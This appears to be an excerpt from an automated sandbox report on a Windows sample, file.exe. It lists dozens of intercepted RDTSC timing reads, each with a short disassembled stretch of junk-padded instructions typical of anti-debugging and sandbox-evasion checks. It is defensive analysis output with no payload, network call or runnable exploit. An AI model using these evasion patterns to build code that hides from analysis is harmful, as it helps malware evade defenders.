                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F552 second address: 93F561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 940009 second address: 940013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FFBC91A3BD6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 940A59 second address: 940A5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 947421 second address: 947425 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 947599 second address: 9475AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFBC8B2DA9Fh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 947A38 second address: 947A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 947A3C second address: 947A43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 947DD8 second address: 947DDE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 947DDE second address: 9225B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DA9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a je 00007FFBC8B2DAADh 0x00000010 push edx 0x00000011 jmp 00007FFBC8B2DAA5h 0x00000016 pop edx 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007FFBC8B2DA98h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 call dword ptr [ebp+122D2727h] 0x00000038 jno 00007FFBC8B2DAB0h 0x0000003e push esi 0x0000003f jng 00007FFBC8B2DA9Eh 0x00000045 push edi 0x00000046 pop edi 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97885B second address: 978861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9789CC second address: 9789D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9789D2 second address: 9789D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9789D8 second address: 9789E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FFBC8B2DA96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 978B4C second address: 978B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 978C9A second address: 978CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DA9Ch 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jnp 00007FFBC8B2DA98h 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 jnl 00007FFBC8B2DA96h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 978F7F second address: 978FF3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FFBC91A3BE2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FFBC91A3BDCh 0x00000011 jng 00007FFBC91A3BEEh 0x00000017 jmp 00007FFBC91A3BE8h 0x0000001c pushad 0x0000001d jmp 00007FFBC91A3BE4h 0x00000022 jmp 00007FFBC91A3BE4h 0x00000027 jnc 00007FFBC91A3BD6h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 979174 second address: 97917B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97917B second address: 9791AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFBC91A3BE8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jne 00007FFBC91A3BD8h 0x00000015 push edx 0x00000016 pop edx 0x00000017 pushad 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9791AA second address: 9791AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984F19 second address: 984F3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFBC91A3BE7h 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984F3C second address: 984F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983D4E second address: 983D54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983D54 second address: 983D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983D58 second address: 983D6C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFBC91A3BD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007FFBC91A3BF1h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983D6C second address: 983D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DAA5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983D8E second address: 983D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983D93 second address: 983D99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 983D99 second address: 983D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9841C5 second address: 9841CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9841CB second address: 9841E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC91A3BE9h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984639 second address: 984640 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984C08 second address: 984C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984C0C second address: 984C55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FFBC8B2DA9Ch 0x0000000c jl 00007FFBC8B2DA96h 0x00000012 jmp 00007FFBC8B2DAA9h 0x00000017 jmp 00007FFBC8B2DAA0h 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 984C55 second address: 984C68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC91A3BDEh 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 989570 second address: 98957C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007FFBC8B2DA96h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98957C second address: 989586 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FFBC91A3BD6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B8B4 second address: 98B8BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B8BA second address: 98B8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FFBC91A3BD8h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FFBC91A3BDBh 0x00000017 je 00007FFBC91A3BD6h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B8DD second address: 98B8E7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FFBC8B2DA96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98B8E7 second address: 98B8ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990868 second address: 99086C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FCFB second address: 98FCFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98FCFF second address: 98FD18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DAA0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9902B0 second address: 9902D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC91A3BE9h 0x00000009 push ebx 0x0000000a jnl 00007FFBC91A3BD6h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop ebx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 990437 second address: 990451 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FFBC8B2DA9Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FFBC8B2DA9Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9959A7 second address: 9959AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9959AD second address: 9959C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA1h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 995C0B second address: 995C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 995C11 second address: 995C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 995C15 second address: 995C19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 947842 second address: 9478C5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FFBC8B2DA96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov ebx, dword ptr [ebp+1248882Fh] 0x00000012 push 00000000h 0x00000014 push edi 0x00000015 call 00007FFBC8B2DA98h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], edi 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc edi 0x00000028 push edi 0x00000029 ret 0x0000002a pop edi 0x0000002b ret 0x0000002c push eax 0x0000002d mov dh, 6Ch 0x0000002f pop ecx 0x00000030 add eax, ebx 0x00000032 stc 0x00000033 push eax 0x00000034 jmp 00007FFBC8B2DAA5h 0x00000039 mov dword ptr [esp], eax 0x0000003c mov cx, 1A12h 0x00000040 push 00000004h 0x00000042 push 00000000h 0x00000044 push esi 0x00000045 call 00007FFBC8B2DA98h 0x0000004a pop esi 0x0000004b mov dword ptr [esp+04h], esi 0x0000004f add dword ptr [esp+04h], 00000015h 0x00000057 inc esi 0x00000058 push esi 0x00000059 ret 0x0000005a pop esi 0x0000005b ret 0x0000005c push eax 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 js 00007FFBC8B2DA96h 0x00000066 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 996AF3 second address: 996AF8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 996AF8 second address: 996B05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jo 00007FFBC8B2DA9Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 996B05 second address: 996B24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFBC91A3BE7h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9994CA second address: 9994D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9997FE second address: 999809 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A12EE second address: 9A12F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FFBC8B2DA96h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A12F8 second address: 9A132F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC91A3BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FFBC91A3BE2h 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007FFBC91A3BD6h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A132F second address: 9A1354 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FFBC8B2DA96h 0x00000008 js 00007FFBC8B2DA96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 jmp 00007FFBC8B2DAA0h 0x00000019 pop ecx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A1354 second address: 9A135C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A135C second address: 9A1360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A1360 second address: 9A136A instructions: 0x00000000 rdtsc 0x00000002 je 00007FFBC91A3BD6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F322 second address: 99F35D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FFBC8B2DAA2h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FFBC8B2DAA2h 0x00000013 jmp 00007FFBC8B2DA9Eh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F5C9 second address: 99F5CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F5CE second address: 99F5D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007FFBC8B2DA96h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F5D9 second address: 99F5F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC91A3BE4h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99F5F8 second address: 99F5FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 99FB8F second address: 99FB93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A041E second address: 9A0424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0A01 second address: 9A0A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FFBC91A3BDCh 0x0000000a jmp 00007FFBC91A3BDFh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0C72 second address: 9A0C77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5FFD second address: 9A6001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5300 second address: 9A5322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DAA7h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5322 second address: 9A5326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5326 second address: 9A5338 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FFBC8B2DA9Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A55C6 second address: 9A55D9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFBC91A3BD6h 0x00000008 jbe 00007FFBC91A3BD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A55D9 second address: 9A5607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DA9Fh 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 jmp 00007FFBC8B2DA9Eh 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5607 second address: 9A560C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A560C second address: 9A5613 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5613 second address: 9A562E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC91A3BE3h 0x00000009 popad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5A84 second address: 9A5A9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007FFBC8B2DA9Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5A9E second address: 9A5AD4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jg 00007FFBC91A3BD6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007FFBC91A3BDDh 0x00000013 pushad 0x00000014 jmp 00007FFBC91A3BE2h 0x00000019 jo 00007FFBC91A3BD6h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A5C36 second address: 9A5C7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jnc 00007FFBC8B2DAB0h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FFBC8B2DA9Ch 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA666 second address: 9AA68C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jp 00007FFBC91A3BD6h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FFBC91A3BE1h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA68C second address: 9AA690 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9AA690 second address: 9AA69E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FFBC91A3BD6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B1F07 second address: 9B1F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFBC8B2DAA5h 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FFBC8B2DAA0h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B209B second address: 9B20A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B20A1 second address: 9B20A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B264B second address: 9B2653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9B2653 second address: 9B2685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FFBC8B2DA96h 0x0000000a jmp 00007FFBC8B2DA9Ah 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 jmp 00007FFBC8B2DAA6h 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9B2908 second address: 9B290C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
